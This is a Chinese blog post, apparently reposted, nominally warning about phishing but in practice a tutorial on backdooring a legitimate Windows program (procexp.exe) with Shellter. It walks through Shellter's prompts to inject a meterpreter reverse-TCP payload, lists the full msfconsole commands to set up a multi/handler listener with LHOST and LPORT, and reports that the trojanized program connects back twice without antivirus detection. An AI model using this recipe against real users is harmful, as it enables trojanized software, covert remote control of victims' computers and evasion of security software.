当前位置:   article > 正文

谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑_shellter enable stealth mode

shellter enable stealth mode

metaspolit配合shellter渗透windows

shellter工具出来有一段时间了,现在用可能被杀软查杀,写这边文章主要展示下,怎么样轻松搞定,HACK WINDOWS PC。

shellter工具下载地址:
https://www.shellterproject.com/download/

我这里下载windows版本,下载后解压
在这里插入图片描述
运行shellter.exe
在这里插入图片描述
1、Choose Operation Mode - Auto/Manual (A/M/H): A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
2、PE Target: //输入要注入shellcode的程序,我这里用PE Target:procexp.exe
3、Enable Stealth Mode? (Y/N/H):N 不开启隐身模式
在这里插入图片描述
4、Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload

5、Select payload by index: 1 //选择第一个,即meterpreter_reverse_tcp

6、SET LHOST: 192.168.78.128 //设置反弹回来的IP 本机,也是运行msf主机的ip地址

7、SET LPORT:4444 //设置接收反弹的端口
在这里插入图片描述
到这里,带后门的procexp.exe程序就生成好了。

开启msf,输入如下命令进行配置

msfconsole
search multi/handler
use exploit/multi/handler
show payloads
set payload windows/meterpreter/reverse_tcp
show options //查看需要配置的参数
set lhost 192.168.78.128
set lport 4444
show options //检查参数是否配置成功
run  //监听
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

运行procexp.exe,目标上线,神奇的是杀软居然没报毒
在这里插入图片描述
运行真正的procexp.exe检查进程
在这里插入图片描述
关掉msf,重启监听,再次运行被注入代码的程序,目标再次上线,还是不报毒
在这里插入图片描述
突然觉点有点……
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/木道寻08/article/detail/918744
推荐阅读
相关标签
  

闽ICP备14008679号